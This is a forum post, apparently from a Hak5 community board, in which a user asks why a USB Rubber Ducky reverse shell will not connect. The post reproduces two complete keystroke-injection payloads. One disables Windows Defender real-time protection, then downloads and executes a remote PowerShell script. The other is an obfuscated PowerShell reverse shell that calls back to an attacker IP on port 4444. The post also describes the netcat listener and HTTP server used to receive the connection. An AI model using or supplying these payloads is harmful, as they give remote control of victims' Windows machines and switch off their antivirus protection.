Jump to content

Problem with Reverse shell - No connection


Dominik75

Recommended Posts

Hello forum members
following yotube videos on "Get a Reverse Shell with the USB Rubber Ducky by downloading playloads from  https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and REVERSEDUCKY loads," I could not properly make any of the payloads for remote access I did everything like in the videos in this regard and the included payloads on the HAK5 website. Both computers on the same network. I put a rubber ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works: python -m http.server 8000 and the second panel nc -l -p 4444. Unfortunately, I cannot connect to Windows through the shell. Payload.ps1 is on the server of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips.Sample loads: 

REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');"
ENTER
STRING exit
ENTER

anather loads:

REM       ReverseDucky2
REM       Version 1.3
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM       Author: 0iphor13

REM       Reverse shell executed in the background
REM       Fill in Attacker-IP and Port in Line 19
REM       DON'T FORGET TO START LISTENER


DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER

DELAY 200
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
DELAY 100
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
DELAY 100
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
DELAY 100
ENTER

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...